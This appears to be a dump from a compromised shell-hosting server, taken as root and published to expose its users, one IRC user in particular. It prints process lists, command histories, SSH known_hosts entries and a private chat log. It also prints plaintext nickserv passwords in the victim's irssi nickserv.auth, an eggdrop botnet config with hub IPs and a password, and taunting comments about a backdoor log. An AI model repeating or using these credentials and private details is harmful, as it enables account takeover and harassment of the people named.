+lyhne1     88130  0.0  0.4 10540  3712  p7- S    22Dec08  69:14.36 ircd: BlackLotus.Sin-Clan.org (ircd)
+lymelyte   88229  0.0  0.3  3880  3016  p7- S    29Mar09   7:28.37 ircd: irc.ftaresource.com (ircd)
+chozen1    89082  0.0  0.1  3192  1032  p7- S     1Mar09   5:32.87 ./psybnc
+kokoryu    93127  0.0  0.3  4060  2852  p7- S     6Feb09  32:11.57 ./eggdrop (eggdrop-1.6.19)
+hts        96224  0.0  0.6 39004  6252  p7- S     2Mar09  51:21.25 ircd: vital.irc.hackthissite.org (ircd)
+visage     96264  0.0  0.2  3192  1692  p7- S    13Mar09   9:27.48 ./eggdrop -m (eggdrop-1.6.19)
+mrts       24165  0.0  0.2  3176  1612  p8- S    28Mar09   7:48.33 ./eggdrop euro.conf (eggdrop-1.6.19)
+jax66      57226  0.0  0.1  1516   652  p8- S    11May09  24:51.69 ./bopm
+brosco     58343  0.0  0.2 15992  1800  p8- S    29Mar09   8:13.84 ./psybnc
+dv327      76866  0.0  0.1 27624  1208  p8- S     9Aug08  15:14.39 ./psybnc
+subkult    88094  0.0  0.1 72724  1280  p8- S    15Jan09  80:54.12 ./psybnc
+bluewish   97486  0.0  0.2  3552  1852  p8- S    29Mar09   8:28.42 ./eggdrop (eggdrop-1.6.19)
+brosco     31552  0.0  0.3  3792  2592  p9- S    16Mar09  14:24.16 ./eggdrop cancer.conf (eggdrop-1.6.19)
+mrts       32626  0.0  0.2  3176  1620  p9- S    20Mar09   8:36.07 ./eggdrop sins.conf (eggdrop-1.6.19)
+poolboy    44789  0.0  0.2  3448  1956  p9- S     9Feb09  15:20.31 ./eggdrop DaB0SS.conf (eggdrop-1.6.17)
+poolboy    44901  0.0  0.2  3312  1896  p9- S     9Feb09  15:07.57 ./eggdrop Little-JR.conf (eggdrop-1.6.17)
+bollox     60129  0.0  0.3  5308  3376  p9- S     4Jun09   2:40.74 ./eggdrop cutenurse.conf (eggdrop-1.6.18)
+bollox     60150  0.0  0.3  5164  3280  p9- S     4Jun09   2:23.03 ./eggdrop slutnurse.conf (eggdrop-1.6.18)
+brosco     76877  0.0  0.2  3760  2348  p9- S    19Mar09  13:04.80 ./eggdrop-1.6.19 -m plague.conf
+crash      99452  0.0  0.2 37052  2128  p9- S    19Mar09  12:20.42 ./psybnc-oth
+paleride     265  0.0  0.2  3648  2092  pb- S    27Jan09  19:36.88 ircd: irc.leechnet.net (ircd)
+paleride     908  0.0  0.1  4276   788  pb- S    27Jan09   1:40.52 ./services -nofork
+grumpy     79140  0.0  0.3  5576  2692  pb- S     4Feb09  16:37.28 ircd: irc.sidnaceous.com (ircd)
+grumpy     82947  0.0  0.1  7572  1140  pb- I     4Feb09   1:28.12 ./services start
+nardi      17529  0.0  0.1 25992  1028  pc- S    24Mar09  23:43.99 ircd: ChatAlb.Albania.Rr.Nu (ircd)
+cazz1961   17100  0.0  0.6  8824  6268  pd- S    Sun06AM  87:41.30 ircd: Smirnoff.1andallirc.net (ircd)
+omgwtf     29455  0.0  0.2  3408  1996  pd- S    Sat04AM   0:48.34 ./eggdrop uno.conf (eggdrop-1.6.19)
+omgwtf     29570  0.0  0.2  3572  2228  pd- S    Sat04AM   0:48.16 ./eggdrop ambition.conf (eggdrop-1.6.19)
+zeepysea   37950  0.0  0.2  3684  1952  pd- S    17Mar09  10:42.06 ircd: irc.eoegameservers.com (ircd)
+zeepysea   38077  0.0  0.1  8204  1092  pd- S    17Mar09   1:07.05 ./services start
+genosyde   63662  0.0  0.2 17308  2432  pd- S    27Jan09  21:57.28 ./psybnc
+matt       83686  0.0  0.1  3140  1184  pd- S    Sat05PM   0:17.40 ./psybnc psybnc.conf
+mrts       84263  0.0  0.2  3172  1636  pd- S    20Mar09   8:46.15 ./eggdrop hez.conf (eggdrop-1.6.19)
+yaquis     94000  0.0  0.5 58432  5312  pd- S    Fri10PM   4:51.24 ircd: irc2.accesox.net (ircd)
+cont       49538  0.0  0.2 19684  1784  pe- S    11Jan09  12:46.04 ./psybnc
+chaos1     56819  0.0  0.8 11604  8064  pf- I    18Jun09   0:40.97 /usr/bin/perl ./idlebot.pl (perl5.8.8)
+[root@velocity:/var/run]# 
+
+[root@velocity:~]# lastcomm -u romeo
+sh               -       romeo            __         0.00 us
+ls               -       romeo            __         0.00 us
+screen           -F      romeo            __         0.00 us
+screen           -F      romeo            __         0.00 us
+w                -       romeo            ttyp1      0.00 us
+sh               -       romeo            ttyp1      0.00 us
+sshd             -F      romeo            __         0.59 us
+bash             -       romeo            ttyp1      0.00 us
+ls               -       romeo            ttyp1      0.00 us
+w                -       romeo            ttyp1      0.00 us
+screen           -       romeo            ttyp1      0.00 us
+screen           -F      romeo            __         0.00 us
+screen           -F      romeo            __         0.00 us
+screen           -F      romeo            __         0.00 us
+w                -       romeo            ttyp1      0.00 us
+sh               -       romeo            ttyp1      0.00 us
+
+[root@velocity:~]# lastcomm -u pimpinjg
+sshd             -F      pimpinjg         __         0.00 us
+bash             -       pimpinjg         ttyp2      0.00 us
+screen           -       pimpinjg         ttyp2      0.00 us
+screen           -F      pimpinjg         __         0.00 us
+screen           -F      pimpinjg         __         0.00 us
+screen           -F      pimpinjg         __         0.00 us
+fortune          -       pimpinjg         ttyp2      0.00 us
+sshd             -F      pimpinjg         __         0.00 us
+sftp-server      -       pimpinjg         __         0.02 us
+sshd             -F      pimpinjg         __         0.03 us
+bash             -       pimpinjg         ttyp2      0.00 us
+tput             -       pimpinjg         ttyp2      0.00 us
+screen           -       pimpinjg         ttyp2      0.00 us
+screen           -F      pimpinjg         __         0.00 us
+screen           -F      pimpinjg         __         0.00 us
+screen           -F      pimpinjg         __         0.00 us
+fortune          -       pimpinjg         ttyp2      0.00 us
+
+
+[root@velocity:/home/romeo]# ls -la 
+total 80
+drwxr-xr-x    4 romeo  romeo   512 Jun 27 21:56 ./
+drwx--x--x  204 root   wheel  3584 Jun 17 18:30 ../
+-rw-------    1 romeo  romeo     5 Jun 17 18:35 .bash_history
+-rw-r--r--    1 romeo  romeo    44 Jun 13 08:05 .bash_profile
+-rw-r--r--    1 romeo  romeo  2469 Jun 13 08:00 .bashprompt
+-rw-r--r--    1 romeo  romeo   258 Jun 13 08:03 .bashrc
+-rw-r--r--    1 romeo  romeo   767 Jun 13 07:56 .cshrc
+-rw-r--r--    1 romeo  romeo    23 Jun 17 18:39 .forward
+drwx------    4 romeo  romeo   512 Jun 17 09:42 irclogs/
+drwx------    3 romeo  romeo   512 Jun 17 09:42 .irssi/
+-rw-------    1 romeo  romeo    35 Jun 26 17:58 .lesshst
+-rw-r--r--    1 romeo  romeo   248 Jun 13 07:56 .login
+-rw-r--r--    1 romeo  romeo   158 Jun 13 07:56 .login_conf
+-rw-------    1 romeo  romeo   373 Jun 13 07:56 .mail_aliases
+-rw-r--r--    1 romeo  romeo   331 Jun 13 07:56 .mailrc
+-rw-r--r--    1 romeo  romeo   797 Jun 13 07:56 .profile
+-rw-------    1 romeo  romeo   276 Jun 13 07:56 .rhosts
+-rw-r--r--    1 romeo  romeo   975 Jun 13 07:56 .shrc
+drwx------    2 romeo  romeo   512 Jun 20 02:58 .ssh/
+
+[root@velocity:/home/romeo]# cat .ssh/known_hosts 
+72.20.6.198 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYSZga5G62dznPwCooUV5e+kVQ8861IxS3aw3ZkDt9uzLZswbqN4iQmkP7bokLACE7Oz2nIiKkVwcjCF8qqO3lk4pdIJNxg6hTuQcZzPR9IHiK38ajERh2JlPPq1zyCwTvPJK8qTNuwZTcdrlJHrFcZpatepHSTu9hdjb+gF4e1oQNyC20nLtD0w1789tFfJKu/5J5jNEOtj7NyfqEwr3nN2iok4LbdZfK321htZwouCWcC2alEacjuYkcRZylgmxhek5dBqLO+LZTvyuppFTiz8RCmwbVSNK+NVgkj4e4WFcR9CoLh2mfW6o4EfE3d9cxFl9Jk/IHLYPQ/TRbaPVw==
+189.14.205.42 ssh-dss AAAAB3NzaC1kc3MAAACBAJgf4VlHspyNWVtAQpi0Lsf78P5bted4NBEAk0MX6w0DNnomC1/kiqOa2pNeZSB05NT42z8+Pxc2a5JwNRolfbpRXPMvMvHYwDMsZAYerz6KOc04nwVskMLBP47bBV6IMbJf2DV7OMBuZI4Li7QfAyW/qJpwUnctChFjSscyv+srAAAAFQDiHNMyrvXk8AJkeKusaJ9vUGdtJwAAAIBr1lDX9MHqMpoeZFE3vX6VbrPfBqK5Zm0EgdSf9QdbGFVD5YcLQhyc88jsrR2sCUBNmQN9hV8o7NedqAFQK1RKToN7ZvrzuFNcOT+yO6/B1Z2WniNojmrbd7/27dJCQz02yXl96f1pFUUcU7gRMdgI9WngNqOE8ZMl3B/jw/MwuAAAAIAoMJDeUlKhowiywrlFC511AfRe+5KfhqK2ohhKne1yr4r5fBrVeTsZeN39qeu23dUOTc7xXP47Iu7STxF7vX6Jw29OWx9vytwbCGNHPMr1kTgRr9n+lHutOZmCqvag2rALA8gs+KUfYrwdUs1p7PDVuTO8bk4HRSPs9wCQnlmpOg==
+opteron1.ircvps.com,98.124.176.76 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq20pbQHr81GL9ny66Z9uzGPPmk3dV8P8QgyBi/tHze21Fx30Uh0z7iq8jw0C+Qc+CZdgtIZBSqZrwyEH9m4mORGyST44c2eTH8Bpao++YIWXxu3qPN7L4idVwKfaWygLB4Xo1fJspA1P6NR6WEuJAS3Xtzs8pEo5MPlFQeS/VFv6SPYqURviwJIAGxt/nHDMRGvteQP2/k+m/jCWZy2bP1tbuPMxYqODoesqqtmyAnhjIIWzXtACA6Y7wJCXwSDdgsXYilzdunChYCtoodsad2zrxaR+bi3RQ7xWBAZu8zEfFxbOMDJiFQedWA9mzg4KR0Nn9DZDvXt/jPO/lqOPPQ==
+quad1.ircvps.com,89.46.100.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
+67.225.142.98 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyJk4nZcAAMllBRJJHJsGZwzviFMbG4kH8OcoRHeC4nXVH+6qs/R79k1Wn0bW7jx4eOW7CtRqW0xLwGTh1eCth7015qq6ekk55gTtZxWHhr6bmX3spalyW9KikPG4j5OM6MThTUaTcJ+GeFLYjlWXqkvIiTTukAxPo5SgfQXT8Fk=
+[root@velocity:/home/romeo]#
+
+[root@velocity:/home/romeo/.irssi]# ls -la 
+total 108
+drwx------  3 romeo  romeo   512 Jun 17 09:42 ./
+drwxr-xr-x  4 romeo  romeo   512 Jun 27 21:56 ../
+-rw-------  1 romeo  romeo  4500 Jun 28 02:13 away.log
+-rw-r--r--  1 romeo  romeo  9591 Jun 27 22:51 config
+-rw-r-----  1 romeo  romeo   584 Jun 17 07:16 config.old
+-rw-r-----  1 romeo  romeo  8472 Jun 27 21:56 default.theme
+-rw-r--r--  1 romeo  romeo  8466 Feb 20 16:08 fear2.theme
+-rw-------  1 romeo  romeo    70 Jun 17 07:31 nickserv.auth
+-rw-r--r--  1 romeo  romeo    74 Jun 17 07:31 nickserv.networks
+-rw-r--r--  1 romeo  romeo  4667 Jun 27 21:56 pandemonium.theme
+drwxr-xr-x  3 romeo  romeo   512 Jun 22 17:50 scripts/
+[root@velocity:~]# 
+
+[root@velocity:/home/romeo/.irssi]# cat nickserv.auth 
+secchat RoMeO   ve2aZCp3GYoq
+bhf     RoMeO   ra7plmyt
+tdirc   RoMeO   sidfh928rf783
+[root@velocity:~]# 
+
+[root@velocity:/]# cat /usr/home/romeo/.irssi/away.log 
+--- Log opened Tue Jun 30 01:08:25 2009
+01:23 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
+01:34 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
+01:42 #bhf: (cc8/HTHg8/:3/RoMeO, romeo, kick this jackass oh romeo?g) e 
+02:00 #bhf: (c+c>/connectiong) ethat is a joke RoMeO
+--- Log closed Tue Jun 30 04:12:51 2009
+--- Log opened Tue Jun 30 19:19:25 2009
+19:39 #darkmindz: (cc8/Zer0g8/:3/RoMeO you familiar with Yatra?g) e+
+19:44 #darkmindz: (c+c>/Purpleyg) enice RoMeO
+19:55 #darkmindz: (c%c>/Biberg) ei dont think that's Romeo
+20:00 #darkmindz: (c+c>/Purpleyg) ehow long have you been associated with darkmindz
+--- Log closed Tue Jun 30 20:06:56 2009
+--- Log opened Tue Jun 30 21:22:55 2009
+21:42 #bhf: (c c>/Crooshg) ehttp://romeo.copyandpaste.info/
+21:42 #bhf: (c c>/Darkg) eThats still Antisec in the context of self-gain
+21:42 #bhf: (c c>/Darkg) eI think theres a legitimate moral standpoint for Antisec
+--- Log closed Tue Jun 30 22:17:55 2009
+--- Log opened Wed Jul 01 00:59:13 2009
+--- Log closed Wed Jul 01 01:00:01 2009
+--- Log opened Wed Jul 01 01:00:23 2009
+01:00 #bhf: (cc8/connectiong8/:3/RoMeO: he's only blocking all ing) e 
+01:00 #bhf: (cc8/HTHg8/:3/RoMeO: raw sockets go below :\g) e+
+01:14 #bhf: (cc8/HTHg8/:3/RoMeO: It made sense to me D:g) e+
+01:27 #bhf: (c+c>/HTHg) eWhy couldnt Romeo get it that fast D:
+01:31 #bhf: (cc8/HTHg8/:3/RoMeO... he didnt get the leet drawing thoughg) e+
+01:31 #bhf: (cc8/Darkg8/:3/RoMeOg) e 
+01:34 #bhf: (c+c>/HTHg) ehis response:  when you are blocking all out and in i dont see how the fuck are you going to attack an outside box
+01:34 #bhf: (cc8/Darkg8/:3/Romeog) e 
+01:53 #bhf: (c c>/Darkg) eUsually he said "You're immature and laughable and Antisec is meaningless and e-violent"
+01:56 #bhf: (c c>/Darkg) ehttp://www.blackhat-forums.com/topic/6447-underground-is-not-dead/page__view__findpost__p__40605
+--- Log closed Wed Jul 01 02:43:40 2009
+--- Log opened Wed Jul 01 03:32:17 2009
+--- Log closed Wed Jul 01 03:32:22 2009
+--- Log opened Wed Jul 01 03:32:24 2009
+--- Log closed Wed Jul 01 05:38:09 2009
+--- Log opened Wed Jul 01 06:53:32 2009
+--- Log closed Wed Jul 01 06:53:36 2009
+--- Log opened Wed Jul 01 06:53:44 2009
+07:03 #darkmindz: (c&c>/Xiresg) e http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/
+[root@velocity:/]# 
+
+
+[root@velocity:/home/romeo/.irssi]# cat config
+servers = (
+  { address = "irc.stealth.net"; chatnet = "IRCNet"; port = "6668"; },
+  { address = "irc.efnet.net"; chatnet = "EFNet"; port = "6667"; },
+  { 
+    address = "irc.undernet.org";
+    chatnet = "Undernet";
+    port = "6667";
+  },
+  { address = "irc.dal.net"; chatnet = "DALnet"; port = "6667"; },
+  { address = "irc.openprojects.net"; chatnet = "OPN"; port = "6667"; },
+  { address = "irc.gnome.org"; chatnet = "GIMPNet"; port = "6667"; },
+  { address = "irc.ptlink.net"; chatnet = "PTlink"; port = "6667"; },
+  { address = "silc.pspt.fi"; chatnet = "SILC"; port = "706"; },
+  {
+    address = "irc.securitychat.org";
+    chatnet = "secchat";
+    port = "6667";
+    autoconnect = "yes";
+    nick = "RoMeO";
+  },
+  { 
+    address = "irc.blackhat-forums.com";
+    chatnet = "bhf";
+    port = "6667";
+    autoconnect = "yes";
+    nick = "RoMeO";
+  },
+  {
+    address = "irc.tdirc.net";
+    chatnet = "tdirc";
+    port = "6667";
+    autoconnect = "yes";
+    nick = "RoMeO";
+  }
+);
+
+chatnets = {
+  IRCNet = {
+    type = "IRC";
+    max_kicks = "4";
+    max_modes = "3";
+    max_msgs = "5";
+    max_whois = "4";
+    max_query_chans = "5";
+  };
+  EFNet = { 
+    type = "IRC";
+    max_kicks = "4";
+    max_modes = "4";
+    max_msgs = "3";
+  };
+  Undernet = {
+    type = "IRC";
+    max_kicks = "4";
+    max_modes = "3";
+    max_msgs = "3";
+  };
+  DALNet = { 
+    type = "IRC";
+    max_kicks = "4";
+    max_modes = "6";
+    max_msgs = "3";
+  };
+  OPN = { type = "IRC"; max_kicks = "4"; max_modes = "4"; max_msgs = "1"; };
+  GIMPNet = {
+    type = "IRC";
+    max_kicks = "4";
+    max_modes = "4";
+    max_msgs = "3";
+  };
+  PTLink = {
+    type = "IRC";
+    max_kicks = "1";
+    max_modes = "6";
+    max_msgs = "100";
+  };
+  SILC = { type = "SILC"; };
+  secchat = { type = "IRC"; };
+  bhf = { type = "IRC"; };
+  tdirc = { type = "IRC"; };
+};
+
+channels = (
+
+  { name = "#bhf"; chatnet = "bhf"; autojoin = "yes"; },
+  { name = "#r00tsecurity"; chatnet = "tdirc"; autojoin = "yes"; },
+  { name = "#thedefaced"; chatnet = "tdirc"; autojoin = "yes"; },
+  { name = "#zer0zone"; chatnet = "tdirc"; autojoin = "yes"; },
+  { name = "#darkmindz"; chatnet = "secchat"; autojoin = "yes"; },
+  { name = "#astalavista"; chatnet = "secchat"; autojoin = "yes"; },
+  { name = "#kinqpinz"; chatnet = "secchat"; autojoin = "yes"; },
+  { name = "#gso-chat"; chatnet = "bhf"; autojoin = "yes"; }
+); 
+
+aliases = {
+  J = "join";
+  WJOIN = "join -window";
+  WQUERY = "query -window";
+  LEAVE = "part";
+  BYE = "quit";
+  EXIT = "quit";
+  SIGNOFF = "quit";
+  DESCRIBE = "action";
+  DATE = "time";
+  HOST = "userhost";
+  LAST = "lastlog";
+  SAY = "msg *";
+  WI = "whois";
+  WII = "whois $0 $0";
+  WW = "whowas";
+  W = "who";
+  N = "names";
+  M = "msg";
+  T = "topic";
+  C = "clear";
+  CL = "clear";
+  K = "kick";
+  KB = "kickban";
+  KN = "knockout";
+  BANS = "ban";
+  B = "ban";
+  MUB = "unban *";
+  UB = "unban";
+  IG = "ignore";
+  UNIG = "unignore";
+  SB = "scrollback";
+  UMODE = "mode $N";
+  WC = "window close";
+  WN = "window new hide";
+  SV = "say Irssi $J ($V) - http://irssi.org/";
+  GOTO = "sb goto";
+  CHAT = "dcc chat";
+  RUN = "SCRIPT LOAD";
+  SBAR = "STATUSBAR";
+  INVITELIST = "mode $C +I";
+};
+
+statusbar = {
+  # formats:
+  # when using {templates}, the template is shown only if its argument isnt
+  # empty unless no argument is given. for example {sb} is printed always,
+  # but {sb $T} is printed only if $T isnt empty.
+
+  items = {
+    # start/end text in statusbars
+    barstart = "{sbstart}";
+    barend = "{sbend}";
+
+    # treated "normally", you could change the time/user name to whatever
+    time = "{sb $Z}";
+    user = "{sb $cumode$N{sbmode $usermode}{sbaway $A}}";
+
+    # treated specially .. window is printed with non-empty windows,
+    # window_empty is printed with empty windows
+    window = "{sb $winref:$T{sbmode $M}}";
+    window_empty = "{sb $winref{sbservertag $tag}}";
+    prompt = "{prompt $[.15]T}";
+    prompt_empty = "{prompt $winname}";
+    topic = " $topic";
+    topic_empty = " Irssi v$J - http://irssi.org/help/";
+
+    # all of these treated specially, theyre only displayed when needed
+    lag = "{sb Lag: $0-}";
+    act = "{sb Act: $0-}";
+    more = "-- more --";
+  };
+
+  # theres two type of statusbars. root statusbars are either at the top
+  # of the screen or at the bottom of the screen. window statusbars are at
+  # the top/bottom of each split window in screen.
+  default = {
+    # the "default statusbar" to be displayed at the bottom of the window.
+    # contains all the normal items.
+    window = {
+      disabled = "no";
+
+      # window, root
+      type = "window";
+      # top, bottom
+      placement = "bottom";
+      # number
+      position = "1";
+      # active, inactive, always
+      visible = "active";
+
+      # list of items in statusbar in the display order
+      items = {
+        barstart = { priority = "100"; };
+        time = { };
+        user = { };
+        window = { };
+        window_empty = { };
+        lag = { priority = "-1"; };
+        act = { priority = "10"; };
+        more = { priority = "-1"; alignment = "right"; };
+        barend = { priority = "100"; alignment = "right"; };
+      };
+    };
+
+    # statusbar to use in inactive split windows
+    window_inact = {
+      type = "window";
+      placement = "bottom";
+      position = "1";
+      visible = "inactive";
+      items = {
+        barstart = { priority = "100"; };
+        window = { };
+        window_empty = { };
+        more = { priority = "-1"; alignment = "right"; };
+        barend = { priority = "100"; alignment = "right"; };
+      };
+    };
+
+    # we treat input line as yet another statusbar :) Its possible to
+    # add other items before or after the input line item.
+    prompt = {
+      type = "root";
+      placement = "bottom";
+      # we want to be at the bottom always
+      position = "100";
+      visible = "always";
+      items = {
+        prompt = { priority = "-1"; };
+        prompt_empty = { priority = "-1"; };
+        # treated specially, this is the real input line.
+        input = { priority = "10"; };
+      };
+    };
+
+    # topicbar
+    topic = {
+      type = "root";
+      placement = "top";
+      position = "1";
+      visible = "always";
+      items = {
+        barstart = { priority = "100"; };
+        topic = { };
+        topic_empty = { };
+        barend = { priority = "100"; alignment = "right"; };
+      };
+    };
+  };
+};
+settings = {
+  core = {
+    real_name = "romeo haxxor"; // "romeo haxxed"
+    user_name = "RoMeO";
+    nick = "RoMeO";
+
+    timestamp_format = "%H:%M:%S";
+    hostname = "absolute.ownage.net"; // absolutely owned..
+  };
+  "fe-common/core" = {
+    autolog = "no";
+    autolog_path = "~/irclogs/$tag/$0-%m%y.log";
+    show_nickmode_empty = "yes";
+    theme = "pandemonium";
+    autocreate_own_query = "no";
+    autocreate_query_level = "DCCMSGS";
+    use_status_window = "no";
+    use_msgs_window = "yes";
+  };
+  "fe-text" = {
+    colors = "yes";
+    autostick_split_windows = "yes";
+    actlist_sort = "refnum";
+  };
+};
+logs = { };
+ignores = ( );
+keyboard = (
+  { key = "meta-1"; id = "change_window"; data = "1"; },
+  { key = "meta-2"; id = "change_window"; data = "2"; },
+  { key = "meta-3"; id = "change_window"; data = "3"; },
+  { key = "meta-4"; id = "change_window"; data = "4"; },
+  { key = "meta-5"; id = "change_window"; data = "5"; },
+  { key = "meta-6"; id = "change_window"; data = "6"; },
+  { key = "meta-7"; id = "change_window"; data = "7"; },
+  { key = "meta-8"; id = "change_window"; data = "8"; },
+  { key = "meta-9"; id = "change_window"; data = "9"; },
+  { key = "meta-0"; id = "change_window"; data = "10"; }
+);
+
+hilights = (
+  { text = "RoMeO"; nick = "yes"; word = "yes"; },
+  { text = "darkmindz"; nick = "yes"; word = "yes"; },
+  { text = "antisec"; nick = "yes"; word = "yes"; }, 
+  { text = "anti-sec"; nick = "yes"; word = "yes"; },
+  { text = "zf0"; nick = "yes"; word = "yes"; },
+  { text = "strayfe"; nick = "yes"; word = "yes"; },
+  { text = "n3w7yp3"; nick = "yes"; word = "yes"; },
+  { text = "copyandpaste"; nick = "yes"; word = "yes"; },
+  { text = "blackhat"; nick = "yes"; word = "yes"; },
+  { text = "whitehat"; nick = "yes"; word = "yes"; },
+  { text = "b0rx"; nick = "yes"; word = "yes"; }
+); // I wonder.. zf0?.. Lulz
+
+windows = {
+  1 = { };
+  2 = { 
+    immortal = "yes";
+    name = "(msgs)";
+    level = "MSGS ACTIONS DCCMSGS";
+  };
+  3 = {
+    items = (
+      { 
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#bhf";
+        tag = "bhf";
+      }
+    );
+  };
+  4 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#gso-chat";
+        tag = "bhf";
+      }
+    );
+  };
+  5 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#r00tsecurity";
+        tag = "tdirc";
+      }
+    );
+  };
+  6 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#thedefaced";
+        tag = "tdirc";
+      }
+    );
+  };
+  7 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#zer0zone";
+        tag = "tdirc";
+      }
+    );
+  };
+  8 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#kinqpinz";
+        tag = "secchat";
+      }
+    );
+  };
+  9 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#darkmindz";
+        tag = "secchat";
+      }
+    );
+  };
+  10 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#astalavista";
+        tag = "secchat";
+      }
+    );
+  };
+};
+mainwindows = { 1 = { first_line = "1"; lines = "49"; }; };
+
+
+[root@velocity:/tmp/...]# cat botnet.conf 
+set harryhub "hub 69.42.223.68:7100" ; # the hub ("hubnick ipadress:port")
+set harryahub "otis 12.226.117.109:7100" ; # the hub ("althubnick ipadress:port")
+set offlinehub 1 ; # run bot in limbomode (1/0) (VERY recomended)
+set owner "shoes , rizo" ; # owner(s) ("Jmns")
+set botnet_pass "xxlgertg51515150rwf0" ; # just set this to some rand string
+set usemsgcmd 0 ; # Enable msg commands (1/0) (not recomended)
+source harry.tcl
+[root@velocity:/tmp/...]# 
+
+[root@velocity:/]# ls -la
+total 129
+drwxr-xr-x   22 root  wheel      512 Jun 29 16:00 ./
+drwxr-xr-x   22 root  wheel      512 Jun 29 16:00 ../
+-rw-r--r--    2 root  wheel      801 Jan 12  2007 .cshrc
+drwxr-xr-x    2 root  wheel      512 Jun 29 16:00 .dev/
+-rw-r--r--    2 root  wheel      251 Jan 12  2007 .profile
+drwxrwxr-x    2 root  operator   512 Apr 12  2007 .snap/
+-r--r--r--    1 root  wheel     6196 Jan 12  2007 COPYRIGHT
+drwxr-xr-x    2 root  wheel     1024 Apr 16  2007 bin/
+drwxr-xr-x    6 root  wheel      512 Apr 16  2007 boot/
+drwxr-xr-x    2 root  wheel      512 Apr 12  2007 cdrom/
+lrwxr-xr-x    1 root  wheel       10 Apr 12  2007 compat@ -> usr/compat
+dr-xr-xr-x    4 root  wheel      512 Dec 31  1969 dev/
+drwxr-xr-x    2 root  wheel      512 Apr 12  2007 dist/
+-rw-------    1 root  wheel     4096 Apr 16  2007 entropy
+drwxr-xr-x   19 root  wheel     2048 Jun 28 21:09 etc/
+lrwxrwxrwx    1 root  wheel        8 Apr 12  2007 home@ -> usr/home
+drwxr-xr-x    2 root  wheel      512 Apr 12  2007 home2/
+-rw-r--r--    1 root  wheel        0 Oct  5  2007 jj.log
+lrwxr-xr-x    1 root  wheel       22 Apr 15  2007 kernconf@ -> /usr/src/sys/i386/conf
+drwxr-xr-x    3 root  wheel     1024 Nov  5  2008 lib/
+drwxr-xr-x    2 root  wheel      512 Apr 16  2007 libexec/
+drwxr-xr-x    2 root  wheel      512 Jan 12  2007 media/
+drwxr-xr-x    2 root  wheel      512 Jan 12  2007 mnt/
+dr-xr-xr-x    2 root  wheel      512 Jan 12  2007 proc/
+drwxr-xr-x    2 root  wheel     2560 Nov  5  2008 rescue/
+drwxr-xr-x    6 root  wheel      512 Jun 29 08:26 root/
+drwxr-xr-x    2 root  wheel     2560 Apr 16  2007 sbin/
+lrwxr-xr-x    1 root  wheel       11 Apr 16  2007 sys@ -> usr/src/sys
+drwxrwxrwt  103 root  wheel     3072 Jun 29 16:00 tmp/
+drwxr-xr-x   24 root  wheel      512 Jun 15 07:35 usr/
+drwxr-xr-x   24 root  wheel      512 Jun 15 05:05 var/
+
+
+[root@velocity:/var/run]# ls -la
+total 112
+drwxr-xr-x   5 root  wheel      512 Jun 26 21:20 ./
+drwxr-xr-x  24 root  wheel      512 Jun 15 05:05 ../
+-rw-r--r--   1 root  wheel        0 Jun 25 11:08 a.out
+-rw-------   1 root  wheel        0 Jun 25 15:43 as.core
+-rw-------   1 root  wheel        3 Jan 27  2008 cron.pid
+-rw-r--r--   1 root  wheel        4 Jan 27  2008 devd.pid
+srw-rw-rw-   1 root  wheel        0 Jan 27  2008 devd.pipe=
+-rw-r--r--   1 root  wheel     5659 Jan 27  2008 dmesg.boot
+-rw-------   1 root  wheel        5 Jun 25 08:57 inetd.pid
+-r--r--r--   1 root  wheel      245 Jun 23 23:21 ld-elf.so.hints
+-r--r--r--   1 root  wheel       67 Jan 27  2008 ld.so.hints
+srw-rw-rw-   1 root  wheel        0 Jan 27  2008 log=
+srw-------   1 root  wheel        0 Jan 27  2008 logpriv=
+drwxr-xr-x   2 bind  bind       512 Jan 12  2007 named/
+drwxrwx---   2 root  network    512 Jan 12  2007 ppp/
+drwxr-xr-x   2 root  wheel      512 Jan 27  2008 proftpd/
+-rw-r--r--   1 root  wheel        4 Jan 27  2008 proftpd.pid
+-rw-r--r--   1 root  wheel    14776 Jun 26 20:09 proftpd.scoreboard
+-rw-------   1 root  wheel       78 Jan 27  2008 sendmail.pid
+-rw-rw-rw-   1 root  wheel     2930 Jun 26 18:08 ssh.old // Backdoor _encrypted_ log file
+-rw-r--r--   1 root  wheel        6 Jun 17 18:29 sshd.pid
+-rw-------   1 root  wheel        3 Jan 27  2008 syslog.pid
+-rw-r--r--   1 root  wheel        0 Jan 27  2008 syslogd.sockets
+-rw-r--r--   1 root  wheel     1496 Jun 26 21:31 utmp
+[root@velocity:/var/run]# 
+
+[root@velocity:/var/run]# cat ssh.old 
